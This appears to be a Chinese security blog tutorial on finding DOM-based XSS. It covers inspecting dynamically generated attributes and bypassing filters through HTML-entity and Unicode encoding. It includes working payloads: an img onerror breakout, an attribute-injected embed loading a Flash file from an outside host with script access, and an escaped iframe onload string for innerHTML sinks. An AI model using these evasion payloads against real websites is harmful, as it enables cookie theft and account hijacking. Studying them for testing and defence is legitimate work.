关于DOM xss跨站的一点点经验之谈

所属分类: 网络安全 / 安全设置 阅读数: 166
收藏 0 赞 0 分享
Xss的危害各位小牛 大牛们都意识到了Xss开始的csrf和挂马 到盗cookies和ajax 到xssshell 还有各种利用....
我们一般找到的都是大多数都停留在找直接输入输出上,这类型的一般很容易被过滤。
隐蔽型的就是DOM xss了.
也就是不是直接输出的, 
 

换句话话说,输出内容,在源代码里看不到.
比如你这里这个的话, 你右键,查看源代码的话 内容都是直接可以看到的这种就是直接 输入输出的
这个就是直接输出类型
对于查找DOM XSS的基本方法:
一般是这样的, 先发一个正常的内容,
然后F12打开调试工具(火狐Firebug插件);
定位到你发的内容上,调试工具里,有一个箭头,可以选择网页里指定的位置的.
然后看你发送的内容里 有没有什么隐藏的属性 或自定义属性
哦 通常的情况是<a href="xxx" title="你输入的某句话">xxxxxxx</a>
而且,“你输入的某句话” ,你直接查看源代码是看不到的
换句话说, <a href="xxx" title="你输入的某句话">xxxxxxx</a> 这个 是被动态产生的
这个时候,就有潜在的问题来了。 如果 “你输入的某句话” 写为xxxxxxxxx"><img><"
会变成<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a>
就会插入一个HTML标签进去了
但是 实际情况下," , > 都是被过滤的(到了这里一般的黑友会说转义了过滤了啊没得突破了-_-我曾经也是这样)
你输入的某句话 写为
xxxxxxxxx&quot;&gt;&lt;img&gt;&lt;&quot;
由于是动态产生的 最后&quot; 会自动变为" 大家觉得很奇怪吧等下解释
&gt;---> >
&lt; ----> <所以最后效果还是<a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> (而且很多程序员,没有过滤& )
下面我们本地测试下

复制代码
代码如下:

<div id="m">x</div>
<script>
var x="内容";
document.getElementById("m").innerHTML=x;
</script>

内容就是我们输入的内容如<script> <iframe>各种标签= =,这些在一般网站输入都被过滤了的 对< ' ">等等各种转义了的话,我们突破就很难.
测试一下

复制代码
代码如下:

<script>
function test(n){
alert(n);}
</script> www.jb51.net
<img src="1" onerror="test('gainover')"></img>
<img src="1" onerror="test('gainover&#x27);+function(){alert(/xx/)}()//')"></img>&#x27

一个编码列子再给大家写个列子

复制代码
代码如下:

<div id="y"></div>
<img id="x" class="audio" src="xxxx" border="0" alt="mp3;http://xsst.sinaapp.com/Xss.swf&quot;><embed src=&quot;http://xsst.sinaapp.com/Xss.swf&quot;type=&quot;application/x-shockwave-flash&quot;allowscriptaccess=&quot;always&quot;><#.mp3"></p> <script>
document.getElementById("y").innerHTML=document.getElementById("x").alt;
</script>xxx.innerHTML= yyy.

某个属性- -成功编码绕过("=&quot=&#39;)编码问题不是我开发的别问我了-_-~!
我们还可以这样来测试下

复制代码
代码如下:

<div id="m">x</div>
<script>
var x="\u003ciframe onload=alert(1)\u003e";
document.getElementById("m").innerHTML=x;
</script>

Unicode字符列表:http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8
Xss安全测试字符转换工具:http://app.baidu.com/app/enter?appid=280383
作者 90sec
更多精彩内容其他人还在看

BYOD需要更具时效性的网络安全防护策略

随着BYOD逐渐由员工带入企业,给企业的安全风险管理带来了不小的压力,因此企业的IT部门试图将网络和数据安全传递给员工,但是这样做也会带来的安全误导
收藏 0 赞 0 分享

linux下防止ssh暴力破解的方法

今天在盛大云看到一个不错的防止ssh暴力破解的帖子,转过来和大家分享下,主要是依靠denyhost软件。稳重所讲的是下载安装包安装,实际上可以从直接使用yum或者apt安装,找到相应的源就可以。
收藏 0 赞 0 分享

PHP Hash冲突导致 CPU 100%的完全解决方法

今天抽空研究了一个前不久,出的一个BUG,PHP 5.2/5.3 Hash漏洞,造成一台机器就可以DDOS攻击互联网上的PHP网站
收藏 0 赞 0 分享

快速击破PaaS安全三大挑战的诀窍

很多担心安全的企业使用一个简单的解决方案:在它们进入云端之前加密对象。不幸的是,这种方法对于减缓平台即服务(PaaS)的安全问题并不是最优的方案
收藏 0 赞 0 分享

禁止sethc.exe运行 防止3389的sethc后门

如果你使用的是Windows 2003/XP,可以在组策略中禁止用户运行指定的程序
收藏 0 赞 0 分享

网管教你预防黑客DdoS攻击的技巧

DDoS攻击是利用一批受控制的机器向一台机器发起攻击,这样来势迅猛的攻击令人难以防备,因此具有较大的破坏性
收藏 0 赞 0 分享

80安全-关于WEB服务器的安全问题浅淡

为什么要叫80安全了,其实也是因为喜欢80sec,紧跟时尚嘛。写的也就是那些道道
收藏 0 赞 0 分享

关于自动化web安全测试动态fuzz的思路与实践分析(图文)

很久之前就想写这么一篇文章,来谈谈我认为的的web2.0甚至是3.0时代,web应用安全测试遇到的几个问题,以及目前知道的解决办法。发出来供大家讨论学习,算是抛砖引玉吧。
收藏 0 赞 0 分享

工业控制系统安全的分析与详细说明(图文)

本文从伊朗核电站的受美国的病毒说去.详谈工业控制系统中的安全问题
收藏 0 赞 0 分享

对源ip地址的封锁脚本代码介绍

网站受到大量主机的非正常连接时,对源ip地址的封锁脚本
收藏 0 赞 0 分享
查看更多